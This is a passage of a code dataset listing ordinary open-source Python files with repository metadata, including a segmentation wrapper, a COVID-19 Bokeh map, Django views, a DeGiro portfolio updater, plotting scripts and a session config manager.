p):\n\t\treturn ((x - 1) // p + 1) * p\n\n\tdef runSegmentation(self, image:Image, return_numpy=True, one_hot=False):\n\t\t'''\n\t\tPasses an image through the network and returns the pixelwise terrain class\n\t\tcategorical probabilities.\n\n\t\tParameters\n\t\t------------\n\t\timage : PIL.Image, image to input to network\n\n\t\tReturns\n\t\t-----------\n\t\tarray : (w,h,k) shape array, pixelwise terrain class probability scores\n\t\t'''\n\n\t\tfeed_dict = {}\n\t\tself.segmentation_module.eval()\n\t\timage = self.prepareImage(image)\n\n\t\tsegSize = (image['img_ori'].shape[0],\n\t\t\t\t image['img_ori'].shape[1])\n\t\timg_resized_list = image['img_data']\n\n\t\twith torch.no_grad():\n\t\t\tscores = torch.zeros(1, cfg.DATASET.num_class, segSize[0], segSize[1])\n\t\t\tscores = async_copy_to(scores, self.args.gpu)\n\n\t\t\tfor img in img_resized_list:\n\t\t\t\tfeed_dict = image.copy()\n\t\t\t\tfeed_dict['img_data'] = img\n\t\t\t\tdel feed_dict['img_ori']\n\t\t\t\tfeed_dict = async_copy_to(feed_dict, self.args.gpu)\n\n\t\t\t\tpred_tmp = self.segmentation_module(feed_dict, segSize=segSize)\n\t\t\t\tscores = scores + pred_tmp / len(cfg.DATASET.imgSizes)\n\t\t\t\n\t\t\tscores = scores.squeeze(0)\n\t\t\tif one_hot and return_numpy:\n\t\t\t\tscores = torch.argmax(scores, 0, keepdim=True)\n\t\t\tif return_numpy:\n\t\t\t\treturn as_numpy(scores.cpu())\n\t\t\telse:\n\t\t\t\treturn scores\n\n\tdef visualize_result(self, img, scores, savepath):\n\t\t'''\n\t\tSaves the segmented image where each pixel is colored based on the\n\t\tmost likely terrain class. 
All red colored classes changed to cyan.\n\n\t\tParameters\n\t\t------------\n\t\timg : PIL.Image, reference image\n\t\tscores : (w,h,k) shape array, pixelwise terrain class probability scores\n\t\tsavepath : str, location to save segmented image\n\t\t'''\n\n\t\tcolors = loadmat('network/color150.mat')['colors']\n\n\t\t# Change all red-colored classes to cyan\n\t\tcolors[15, :] = [10, 186, 181]\n\t\tcolors[18, :] = [10, 186, 181]\n\t\tcolors[22, :] = [10, 186, 181]\n\t\tcolors[24, :] = [10, 186, 181]\n\t\tcolors[28, :] = [10, 186, 181]\n\t\tcolors[34, :] = [10, 186, 181]\n\t\tcolors[42, :] = [10, 186, 181]\n\t\tcolors[49, :] = [10, 186, 181]\n\t\tcolors[52, :] = [10, 186, 181]\n\t\tcolors[66, :] = [10, 186, 181]\n\t\tcolors[83, :] = [10, 186, 181]\n\t\tcolors[108, :] = [10, 186, 181]\n\n\t\t# _, pred = torch.max(scores, dim=1)\n\t\tpred = np.argmax(scores, axis=0)\n\n\t\t# print predictions in descending order\n\t\tpred = np.int32(pred)\n\t\tpixs = pred.size\n\t\tuniques, counts = np.unique(pred, return_counts=True)\n\n\t\t# colorize prediction\n\t\tpred_color = colorEncode(pred, colors).astype(np.uint8)\n\n\t\t# aggregate images and save\n\t\tim_vis = np.concatenate((img, pred_color), axis=1)\n\n\t\t# Image.fromarray(im_vis).save(savepath)\n\t\tImage.fromarray(im_vis).show()\n\t\tImage.fromarray(pred_color).save(savepath)\n\n\nif __name__ == '__main__':\n\timage = Image.open('00001.jpg').convert('RGB')\n\n\tnetwork = SemanticSegmentationNetwork()\n\tscores = network.runSegmentation(image)\n","repo_name":"roahmlab/sel_map","sub_path":"sel_map_segmentation/mit_semseg_wrapper/src/mit_semseg_wrapper/semsegNetwork.py","file_name":"semsegNetwork.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"84"} +{"seq_id":"25969383184","text":"#User function Template for python3\nfrom collections import OrderedDict\n\nclass Solution:\n def FirstNonRepeating(self, A):\n count_dict = OrderedDict()\n result = []\n \n for ch in A:\n count_dict[ch] = count_dict.get(ch, 0) + 1\n \n non_repeating_ch = None\n for key, value in count_dict.items():\n if value == 1:\n non_repeating_ch = key\n break\n \n if non_repeating_ch:\n result.append(non_repeating_ch)\n else:\n result.append('#')\n \n return ''.join(result)\n\n\n#{ \n # Driver Code Starts\n\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n\tT=int(input())\n\tfor i in range(T):\n\t\tA = input()\n\t\tob = Solution()\n\t\tans = ob.FirstNonRepeating(A)\n\t\tprint(ans)\n\n# } Driver Code Ends","repo_name":"Umang-Lodaya/LeetCode-Questions","sub_path":"First non-repeating character in a stream - GFG/first-nonrepeating-character-in-a-stream.py","file_name":"first-nonrepeating-character-in-a-stream.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41471366294","text":"#6-6. Polling: Use the code in favorite_languages.py (page 104).\n#108 Chapter 6\n#•\t Make a list of people who should take the favorite languages poll. Include\n#some names that are already in the dictionary and some that are not.\n#•\t Loop through the list of people who should take the poll. 
If they have\n#already taken the poll, print a message thanking them for responding.\n#If they have not yet taken the poll, print a message inviting them to take\n#the poll\n\nfavorite_languages = {\n\t\"jen\": \"python\",\n\t\"sarah\": \"c\",\n\t\"edward\": \"ruby\",\n\t\"phil\": \"python\",\n}\n\nshould_take_poll = [\"gabriel\", \"jen\", \"sarah\", \"matheus\", \"edward\", \"ale\", \"luan\"]\n\nfor name in should_take_poll:\n\tif name in favorite_languages:\n\t\tprint(\"{}, thanks for responding.\" .format(name.title()))\n\telse:\n\t\tprint(\"{}, you'd be welcome to take the poll.\" .format(name.title()))","repo_name":"gabrieldomene/Code-Everyday","sub_path":"ExLivro/Dict6-6.py","file_name":"Dict6-6.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"73336559634","text":"import os\nimport re\nfrom pip.download import PipSession\nfrom pip.req import parse_requirements\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nwith open('blackfynn/__init__.py', 'r') as fd:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]',\n fd.read(), re.MULTILINE).group(1)\n\nif not version:\n raise RuntimeError('Cannot find version information')\n\ninstall_reqs = parse_requirements('requirements.txt', session=PipSession())\nreqs = [str(ir.req) for ir in install_reqs]\n\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = \"blackfynn\",\n version = version,\n author = \"Blackfynn, Inc.\",\n author_email = \"mark@blackfynn.com\",\n description = \"Python client for the Blackfynn Platform\",\n long_description = long_description,\n packages=find_packages(),\n package_dir={'blackfynn': 'blackfynn'},\n setup_requires=['cython'],\n install_requires = reqs,\n python_requires='<3',\n entry_points = {\n 'console_scripts': [\n 'bf=blackfynn.cli.bf:blackfynn_cli',\n ]\n },\n license = \"\",\n keywords = \"blackfynn client rest api\",\n url = \"http://app.blackfynn.io\",\n download_url = \"\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Topic :: Utilities\",\n ],\n)\n","repo_name":"intrepidlemon/blackfynn-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4409425918","text":"import csv\r\nimport geopandas as gpd\r\nimport pandas as pd\r\nfrom bokeh.io import show, curdoc\r\nfrom bokeh.plotting import figure\r\nfrom bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar\r\nfrom bokeh.models import Slider, HoverTool\r\nimport json\r\nfrom bokeh.palettes import brewer\r\nfrom bokeh.models import CheckboxButtonGroup, RadioButtonGroup, CustomJS\r\nfrom bokeh.layouts import widgetbox, row, column\r\n\r\n# Names of files needed\r\ncovid_map = \"ontario_map/Ministry_of_Health_Public_Health_Unit_Boundary.shp\"\r\ncovid_data = \"cases_by_status_and_phu.csv\"\r\n\r\n# Open .csv file using dictionaries\r\ninput_data = csv.DictReader(open(covid_data))\r\n\r\n# Open files using GeoPandas and Pandas\r\ndata_map_df = gpd.read_file(covid_map)[['OGF_ID', 'PHU_NAME_E', 'geometry']]\r\ncovid_data_df = 
pd.DataFrame.from_dict(input_data)\r\n\r\n# Fetch data for the latest date and merge it to the map\r\nlatest_covid_data_df = covid_data_df[covid_data_df['FILE_DATE'] == \"20200410\"]\r\nmerged = data_map_df.merge(latest_covid_data_df, left_on=\"PHU_NAME_E\", right_on=\"PHU_NAME\")\r\n\r\n#Read data to json.\r\nmerged_json = json.loads(merged.to_json())\r\n\r\n#Convert to String like object. \r\njson_data = json.dumps(merged_json)\r\n\r\n#Define function that returns json_data for the date selected by user. \r\ndef json_data_mapping(date):\r\n    dt = date\r\n    print(str(dt))\r\n    print(covid_data_df['FILE_DATE'] == str(dt))\r\n    c19df_dt = covid_data_df[covid_data_df['FILE_DATE'] == str(dt)]\r\n    merged = data_map_df.merge(c19df_dt, left_on=\"PHU_NAME_E\", right_on=\"PHU_NAME\")\r\n    #merged.fillna('No data', inplace = True)\r\n    merged_json = json.loads(merged.to_json())\r\n    json_data = json.dumps(merged_json)\r\n    return json_data\r\n\r\n#Define a sequential multi-hue color palette.\r\npalette = brewer['RdYlGn'][8]\r\n\r\n#Add hover tool\r\nhover = HoverTool(tooltips = [ ('Public Health Unit','@PHU_NAME'),('Active Cases No: ', '@ACTIVE_CASES')])\r\n\r\n# GeoData source\r\ngeosource = GeoJSONDataSource(geojson = json_data)\r\n\r\n#Instantiate LinearColorMapper that linearly maps numbers in a range, into a sequence of colors. Input nan_color.\r\ncolor_mapper = LinearColorMapper(palette = palette, low = 0, high = 40, nan_color = '#d9d9d9')\r\n\r\n# Function that will generate fill_color dictionary\r\ncolour_filling = {'field' :'ACTIVE_CASES', 'transform' : color_mapper}\r\n\r\n#Define custom tick labels for color bar.\r\ntick_labels = {'0': '0%', '5': '5%', '10':'10%', '15':'15%', '20':'20%', '25':'25%', '30':'30%','35':'35%', '40': '>40%'}\r\n\r\n# Function that will re-draw the map with data category that was selected by the user\r\ndef map_redraw(choice):\r\n    fill_dict = {}\r\n    if choice == 0:\r\n        # Draw the map with Active Cases\r\n        fill_dict.update({'field' :'ACTIVE_CASES', 'transform' : color_mapper})\r\n    elif choice == 1:\r\n        # Draw the map with Resolved Cases\r\n        fill_dict.update({'field' :'RESOLVED_CASES', 'transform' : color_mapper})\r\n    else:\r\n        # Draw the map with Deaths\r\n        fill_dict.update({'field' :'DEATHS', 'transform' : color_mapper})\r\n    return fill_dict\r\n\r\n#Create color bar. 
\r\ncolor_bar = ColorBar(color_mapper=color_mapper, label_standoff=8,width = 500, height = 20,\r\n border_line_color=None,location = (0,0), orientation = 'horizontal', major_label_overrides = tick_labels)\r\n\r\n# Draw map\r\ndata_map = figure(title=\"Active COVID cases by Public Health Unit in Ontario\", plot_height = 600 , plot_width = 950, toolbar_location = None, tools=[hover], output_backend=\"webgl\")\r\ndata_map.patches(source=geosource, line_color = 'black', fill_color = colour_filling, line_width = 0.25, fill_alpha = 1)\r\n\r\n# Update the data that is displayed\r\ndef json_data_update(attr, old, new):\r\n geosource.geojson = json_data_mapping(data_slider.value)\r\n data_map.patches(source=geosource, line_color = 'black', fill_color = colour_filling, line_width = 0.25, fill_alpha = 1)\r\n\r\ndef update(attr, old, new):\r\n # Adjust map by using radio buttons\r\n colour_fillings = map_redraw(new)\r\n categories = [\"Active COVID cases\", \"Resolved COVID cases\", \"Deaths due to COVID\"]\r\n data_map.patches(source=geosource, line_color = 'black', fill_color = colour_fillings, line_width = 0.25, fill_alpha = 1)\r\n data_map.title.text = categories[new] + ' by Public Health Unit in Ontario'\r\n\r\n#Specify figure layout.\r\ndata_map.add_layout(color_bar, 'below')\r\nbutton_group = RadioButtonGroup(labels=[\"Active Cases\", \"Resolved Cases\", \"Deaths\"], active=0)\r\nbutton_group.on_change('active', lambda attr, old, new: update(attr, old, new))\r\n# Slider tool for selecting dates\r\ndata_slider = Slider(title = 'Date (YYYYMMDD)',start = 20200410, end = 20201224, step = 1, value = 20200410)\r\ndata_slider.on_change('value', json_data_update)\r\n# Output final map\r\nproject_layout = column(data_map,widgetbox(button_group, data_slider))\r\ncurdoc().add_root(project_layout)\r\n","repo_name":"DragiPlakalovic/COVID19_DataVis_Ontario","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"18017528058","text":"from collections import UserList\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView, Request, Response, status\nfrom core.pagination import CustomPageNumberPagination\nfrom users.models import User, Userlist\nfrom .permissions import HasPermission, HasToken\nfrom animes.models import Anime\nfrom rest_framework.authentication import TokenAuthentication\nfrom userslist.serializers import UserListSerializer\n\n\ndef formatted_response(data):\n\n serializer_data = {\n **data,\n \"anime\": {\n \"id\": Anime.objects.get(pk=data[\"anime\"]).id,\n \"title\": Anime.objects.get(pk=data[\"anime\"]).title,\n \"image\": Anime.objects.get(pk=data[\"anime\"]).image,\n \"average_rate\": Anime.objects.get(pk=data[\"anime\"]).average_rate,\n },\n \"user\": {\n \"id\": User.objects.get(pk=data[\"user\"]).id,\n \"name\": User.objects.get(pk=data[\"user\"]).first_name,\n },\n }\n\n return serializer_data\n\n\nclass UserlistView(APIView, CustomPageNumberPagination):\n\n authentication_classes = [TokenAuthentication]\n permission_classes = [HasToken, HasPermission]\n\n def get(self, request):\n\n userlist = Userlist.objects.filter(user=request.user)\n result_page = self.paginate_queryset(userlist, request, view=self)\n serializer = UserListSerializer(result_page, many=True)\n serializer_data = []\n\n for values in serializer.data:\n serializer_data.append(formatted_response(values))\n\n 
return self.get_paginated_response(serializer_data)\n\n\nclass UserlistViewDetail(APIView):\n\n authentication_classes = [TokenAuthentication]\n permission_classes = [HasPermission]\n\n def post(self, request: Request, anime_id):\n\n anime = get_object_or_404(Anime, pk=anime_id)\n serializer = UserListSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(user=request.user, anime=anime)\n serializer_data = formatted_response(serializer.data)\n return Response(serializer_data, status.HTTP_201_CREATED)\n\n def patch(self, request: Request, myanime_id):\n\n my_anime = get_object_or_404(Userlist, pk=myanime_id)\n serializer = UserListSerializer(instance=my_anime, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n serializer_data = formatted_response(serializer.data)\n return Response(serializer_data, status.HTTP_200_OK)\n","repo_name":"brunotetzner/re-viewers","sub_path":"userslist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"2641972343","text":"import ConfigParser\nimport os\nimport shutil\nimport sys\nfrom threading import Thread\nimport time\n\nimport wx.lib.pubsub as ps\n\nfrom utils import Singleton, debug\n\nclass Session(object):\n # Only one session will be initialized per time. Therefore, we use\n # Singleton design pattern for implementing it\n __metaclass__= Singleton\n\n def __init__(self):\n self.temp_item = False\n\n ws = self.ws = WriteSession(self)\n ws.start()\n ps.Publisher().subscribe(self.StopRecording, \"Stop Config Recording\")\n\n def CreateItens(self):\n import constants as const\n self.project_path = ()\n self.debug = False\n\n self.project_status = const.PROJ_CLOSE\n # const.PROJ_NEW*, const.PROJ_OPEN, const.PROJ_CHANGE*,\n # const.PROJ_CLOSE\n\n self.mode = const.MODE_RP\n # const.MODE_RP, const.MODE_NAVIGATOR, const.MODE_RADIOLOGY,\n # const.MODE_ODONTOLOGY\n\n # InVesalius default projects' directory\n homedir = self.homedir = os.path.expanduser('~')\n tempdir = os.path.join(homedir, \".invesalius\", \"temp\")\n if not os.path.isdir(tempdir):\n os.makedirs(tempdir)\n self.tempdir = tempdir\n\n # GUI language\n self.language = \"\" # \"pt_BR\", \"es\"\n\n # Recent projects list\n self.recent_projects = [(const.SAMPLE_DIR, \"Cranium.inv3\")]\n self.last_dicom_folder = ''\n\n self.CreateSessionFile()\n\n def StopRecording(self, pubsub_evt):\n self.ws.Stop()\n\n def SaveConfigFileBackup(self):\n path = os.path.join(self.homedir ,\n '.invesalius', 'config.cfg')\n path_dst = os.path.join(self.homedir ,\n '.invesalius', 'config.backup')\n shutil.copy(path, path_dst)\n\n def RecoveryConfigFile(self):\n homedir = self.homedir = os.path.expanduser('~')\n try:\n path = os.path.join(self.homedir ,\n '.invesalius', 'config.backup')\n path_dst = os.path.join(self.homedir ,\n '.invesalius', 'config.cfg')\n shutil.copy(path, path_dst)\n return True\n except(IOError):\n return False\n\n\n def CloseProject(self):\n import constants as const\n debug(\"Session.CloseProject\")\n self.project_path = ()\n self.project_status = const.PROJ_CLOSE\n #self.mode = const.MODE_RP\n self.temp_item = False\n\n def SaveProject(self, path=()):\n import constants as const\n debug(\"Session.SaveProject\")\n self.project_status = const.PROJ_OPEN\n if path:\n self.project_path = path\n self.__add_to_list(path)\n if self.temp_item:\n self.temp_item = False\n\n def ChangeProject(self):\n import 
constants as const\n debug(\"Session.ChangeProject\")\n self.project_status = const.PROJ_CHANGE\n\n def CreateProject(self, filename):\n import constants as const\n debug(\"Session.CreateProject\")\n ps.Publisher().sendMessage('Begin busy cursor')\n # Set session info\n self.project_path = (self.tempdir, filename)\n self.project_status = const.PROJ_NEW\n self.temp_item = True\n return self.tempdir\n\n def OpenProject(self, filepath):\n import constants as const\n debug(\"Session.OpenProject\")\n # Add item to recent projects list\n item = (path, file) = os.path.split(filepath)\n self.__add_to_list(item)\n\n # Set session info\n self.project_path = item\n self.project_status = const.PROJ_OPEN\n\n def RemoveTemp(self):\n if self.temp_item:\n (dirpath, file) = self.project_path\n path = os.path.join(dirpath, file)\n os.remove(path)\n self.temp_item = False\n\n def CreateSessionFile(self):\n config = ConfigParser.RawConfigParser()\n\n config.add_section('session')\n config.set('session', 'mode', self.mode)\n config.set('session', 'status', self.project_status)\n config.set('session','debug', self.debug)\n config.set('session', 'language', self.language)\n\n config.add_section('project')\n config.set('project', 'recent_projects', self.recent_projects)\n\n config.add_section('paths')\n config.set('paths','homedir',self.homedir)\n config.set('paths','tempdir',self.tempdir)\n try:\n config.set('paths','last_dicom_folder',self.last_dicom_folder.encode('utf-8'))\n except (UnicodeEncodeError, UnicodeDecodeError):\n config.set('paths','last_dicom_folder',self.last_dicom_folder)\n path = os.path.join(self.homedir ,\n '.invesalius', 'config.cfg')\n\n configfile = open(path, 'wb')\n config.write(configfile)\n configfile.close()\n\n\n def __add_to_list(self, item):\n import constants as const\n # Last projects list\n l = self.recent_projects\n\n # If item exists, remove it from list\n if l.count(item):\n l.remove(item)\n\n # Add new item\n l.insert(0, item)\n\n # Remove oldest projects from list\n if len(l)>const.PROJ_MAX:\n for i in xrange(len(l)-const.PROJ_MAX):\n l.pop()\n\n def GetLanguage(self):\n return self.language\n\n def SetLanguage(self, language):\n self.language = language\n\n def GetLastDicomFolder(self):\n return self.last_dicom_folder\n\n def SetLastDicomFolder(self, folder):\n self.last_dicom_folder = folder\n self.CreateSessionFile()\n\n def ReadLanguage(self):\n config = ConfigParser.ConfigParser()\n home_path = os.path.expanduser('~')\n path = os.path.join(home_path ,'.invesalius', 'config.cfg')\n try:\n config.read(path)\n self.language = config.get('session','language')\n return self.language\n except (ConfigParser.NoSectionError,\n ConfigParser.NoOptionError,\n ConfigParser.MissingSectionHeaderError):\n return False\n\n def ReadSession(self):\n config = ConfigParser.ConfigParser()\n home_path = os.path.expanduser('~')\n path = os.path.join(home_path ,'.invesalius', 'config.cfg')\n try:\n config.read(path)\n self.mode = config.get('session', 'mode')\n self.project_status = config.get('session', 'status')\n self.debug = config.get('session','debug')\n self.language = config.get('session','language')\n self.recent_projects = eval(config.get('project','recent_projects'))\n self.homedir = config.get('paths','homedir')\n self.tempdir = config.get('paths','tempdir')\n self.last_dicom_folder = config.get('paths','last_dicom_folder')\n self.last_dicom_folder = self.last_dicom_folder.decode('utf-8')\n return True\n\n except(ConfigParser.NoSectionError, ConfigParser.NoOptionError,\n 
ConfigParser.MissingSectionHeaderError, ConfigParser.ParsingError):\n\n            if (self.RecoveryConfigFile()):\n                self.ReadSession()\n                return True\n            else:\n                return False\n\n\nclass WriteSession(Thread):\n\n    def __init__ (self, session):\n        Thread.__init__(self)\n        self.session = session\n        self.running = 1\n\n    def run(self):\n        while self.running:\n            time.sleep(10)\n            try:\n                self.Write()\n            except AttributeError:\n                debug(\"Session: trying to write into inexistent file\")\n\n    def Stop(self):\n        self.running = 0\n\n    def Write(self):\n        import utils as utl\n\n        config = ConfigParser.RawConfigParser()\n\n        config.add_section('session')\n        config.set('session', 'mode', self.session.mode)\n        config.set('session', 'status', self.session.project_status)\n        config.set('session','debug', self.session.debug)\n        config.set('session', 'language', self.session.language)\n\n        config.add_section('project')\n        config.set('project', 'recent_projects', self.session.recent_projects)\n\n        config.add_section('paths')\n        config.set('paths','homedir',self.session.homedir)\n        config.set('paths','tempdir',self.session.tempdir)\n        config.set('paths','last_dicom_folder', self.session.last_dicom_folder)\n\n        path = os.path.join(self.session.homedir ,\n                            '.invesalius', 'config.cfg')\n\n        try:\n            configfile = open(path, 'wb')\n        except IOError:\n            utl.debug(\"Session - IOError\")\n            return\n        finally:\n            self.session.CreateSessionFile()\n\n        configfile.close()\n\n\n\n\n","repo_name":"kragen/invesalius","sub_path":"invesalius/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"}
{"seq_id":"37055427400","text":"from degiro_utils import *\nfrom market_data import update_market_data_series_csv\nfrom factor_data import update_factor_data_series_csv\nfrom just_etf_scraping import augment_product_details_csv\nfrom db_utils import *\n\n\ndef run_update_transactions_csv(degiro_session: degiroapi.DeGiro,\n                                start_date: str = '2000-01-01',\n                                transactions_csv_path: str = TRANSACTIONS_CSV_PATH) -> None:\n    exit_loop = 'NO'\n\n    while exit_loop == 'NO':\n        # Update the transactions\n        print('Updating the transactions csv...\\n')\n        update_transactions_csv(\n            degiro_session=degiro_session,\n            transactions_csv_path=transactions_csv_path,\n            start_date=start_date)\n        print('Done.\\n')\n        # Ask if another update from another account is needed\n        exit_loop = ask_yes_no_question(\n            'Type YES if you want the routine to move forward to the Historical data retrieval.\\n\\nIn case you wish to '\n            'repeat the transactions csv update procedure for a different account, type NO. (y/n)... 
')\n\n if exit_loop == 'NO':\n # Logout and start a new DeGiro session\n degiro_session.logout()\n degiro_session = start_degiro_session()\n\n\ndef run_update_product_price_series_csv(degiro_session: degiroapi.DeGiro,\n transactions_df: pd.DataFrame,\n product_price_series_csv_path: str = PRODUCT_PRICE_SERIES_CSV_PATH) -> None:\n product_id_ls = list(set(transactions_df['product_id'].tolist()))\n old_price_time_series = None # Initialize\n\n if os.path.exists(product_price_series_csv_path):\n old_price_time_series = pd.read_csv(\n product_price_series_csv_path, parse_dates=['date']).sort_values(['product_id', 'date'], ascending=True)\n product_id_to_last_update_date = old_price_time_series.groupby(['product_id'])[['date']].last()['date'].\\\n apply(lambda dt: dt.strftime(DATE_FORMAT)).to_dict()\n # Date to String\n old_price_time_series['date'] = old_price_time_series['date'].apply(lambda dt: dt.strftime(DATE_FORMAT))\n else:\n # Load full history\n product_id_to_last_update_date = dict(zip(product_id_ls, ['1900-01-01'] * len(product_id_ls)))\n\n # Loop through products and store new series\n updated_series = []\n for product_id in product_id_to_last_update_date.keys():\n updated_series.append(\n retrieve_product_price_series(degiro_session,\n [product_id],\n start_date=product_id_to_last_update_date.get(product_id, '1900-01-01')))\n new_price_time_series = pd.concat(updated_series, axis=0)\n # Date to String\n new_price_time_series['date'] = new_price_time_series['date'].apply(lambda dt: dt.strftime(DATE_FORMAT))\n\n if os.path.exists(product_price_series_csv_path): # Merge with old data\n new_price_time_series = pd.concat([new_price_time_series, old_price_time_series], axis=0).drop_duplicates()\n\n # Write csv\n new_price_time_series.sort_values(['product_id', 'date', 'price']).to_csv(product_price_series_csv_path,\n index=False)\n\n\ndef run_update(username: str = None,\n password: str = None,\n start_date: str = None,\n transactions_csv_path: str = TRANSACTIONS_CSV_PATH,\n product_details_csv_path: str = PRODUCT_DETAILS_CSV_PATH,\n product_price_series_csv_path: str = PRODUCT_PRICE_SERIES_CSV_PATH,\n ) -> None:\n # Retrieve last update date as a default\n start_date = check_last_update_date(transactions_csv_path) if start_date is None else start_date\n\n # Start a DeGiro session\n print('Welcome!\\n\\n')\n degiro_session = start_degiro_session(username=username, password=password)\n\n enter_loop = ask_yes_no_question('Do you want to update your DeGiro transactions? (y/n)...')\n\n # Update Transaction Data\n if enter_loop in ['Y', 'YES']:\n run_update_transactions_csv(degiro_session=degiro_session,\n start_date=start_date,\n transactions_csv_path=transactions_csv_path)\n\n # Load Transaction data\n transactions_df = load_transactions()\n\n enter_loop = ask_yes_no_question('Do you want to update your DeGiro Product Details? (y/n)...')\n if enter_loop in ['Y', 'YES']:\n print('Updating the product details csv...\\n')\n update_product_details_csv(\n degiro_session, transactions_df['product_id'].tolist(), product_details_csv_path)\n augment_product_details_csv(product_details_csv_path=product_details_csv_path)\n print('Done.\\n')\n\n print('Retrieving and storing Historical daily close prices...\\n')\n # Prices\n run_update_product_price_series_csv(degiro_session,\n transactions_df,\n product_price_series_csv_path)\n\n # Log out from DeGiro\n degiro_session.logout()\n\n enter_loop = ask_yes_no_question('Do you want to update market data? 
(y/n)...')\n    if enter_loop in ['Y', 'YES']:\n        print('Updating market data series csv...\\n')\n        update_market_data_series_csv(market_data_details_path=MARKET_DATA_DETAILS_PATH,\n                                      market_data_series_path=MARKET_DATA_SERIES_PATH)\n        print('Done.\\n')\n\n    enter_loop = ask_yes_no_question('Do you want to update factor data? (y/n)...')\n    if enter_loop in ['Y', 'YES']:\n        print('Updating factor data series csv...\\n')\n        update_factor_data_series_csv(factor_data_details_path=FACTOR_DATA_DETAILS_PATH,\n                                      factor_data_series_path=FACTOR_DATA_SERIES_PATH)\n        print('Done.\\n')\n\n    print('Update is finished. Exiting Routine...')\n\n\nif __name__ == '__main__':\n    run_update()\n","repo_name":"lucalaringe/degiro_portfolio_analytics","sub_path":"src/run_update.py","file_name":"run_update.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"84"}
{"seq_id":"18398773687","text":"import pandas as pd\n\n# 读取数据\ndata = pd.read_csv(\"../FilteredData/version_0.0.1.csv\")\n\n# 找到重复数据\nduplicated_data = data[data.duplicated()]\n\n# 清洗重复数据\ncleaned_data = data.drop_duplicates()\n\n# 保存转换后的数据\ncleaned_data.to_csv(\"version_0.0.2.csv\", index=False)\n\n# 输出清洗后的数据\nprint(cleaned_data)\n\n\n","repo_name":"ZsmTeamProject/Project01","sub_path":"Filter/Filter_duplicated.py","file_name":"Filter_duplicated.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"26333259644","text":"import csv\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\nfilename = 'data/sitka_weather_2018_simple.csv'\nfilename2 = 'data/death_valley_2018_simple.csv'\n\n# reads header rows in CSV file\nwith open(filename) as f:\n    weather = csv.reader(f)\n    header_row = next(weather)\n    station = next(weather)[1]\n\n    # outputs data into lists\n    highs, lows, dates = [], [], []\n    for row in weather:\n        date = datetime.strptime(row[2], '%Y-%m-%d')\n        tmax = int(row[5])\n        tmin = int(row[6])\n\n        highs.append(tmax)\n        lows.append(int(tmin))\n        dates.append(date)\n\nwith open(filename2) as f2:\n    reader2 = csv.reader(f2)\n    header_row2 = next(reader2)\n\n    # outputs data into lists\n    highs2, lows2, dates2 = [], [], []\n    for row in reader2:\n        try:\n            highs2.append(int(row[5]))\n        except ValueError:\n            pass\n        else:\n            lows2.append(int(row[6]))\n            dates2.append(datetime.strptime(row[2], '%Y-%m-%d'))\n\nfig, ax = plt.subplots()\nplt.style.use('seaborn')\nax.plot(dates, highs, c='blue', alpha=0.5)\nax.plot(dates, lows, c='blue', alpha=0.5)\n\n#ax.plot(dates2, highs2, c='red', alpha=0.5)\n#ax.plot(dates2, lows2, c='red', alpha=0.5)\nfig.autofmt_xdate()\n\nplt.title(f'Temperature, {station}, 2018', fontsize=20)\nplt.xlabel('Date', fontsize=16)\nplt.ylabel('Temp. 
Fahr.', fontsize=16)\nplt.fill_between(dates, highs, lows, facecolor='blue', alpha=0.2)\n#plt.fill_between(dates2, highs2, lows2, facecolor='red', alpha=0.2)\nplt.tick_params(axis='both', which='major')\n\nplt.show()\n","repo_name":"ccreevan/matplotlib","sub_path":"sitka.py","file_name":"sitka.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"19536006160","text":"#coding:utf-8\n\nclass Host:\n\n    def __init__(self, ip, query=None, totalRes=None, availableRes=None, status=None):\n        self.ip = ip\n        self.query = query\n        self.totalRes = totalRes\n        self.availableRes = availableRes\n        self.status = status \n","repo_name":"alibaba/alimama-common-performance-platform-acp","sub_path":"Pressure/src/res_manager/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"84"}
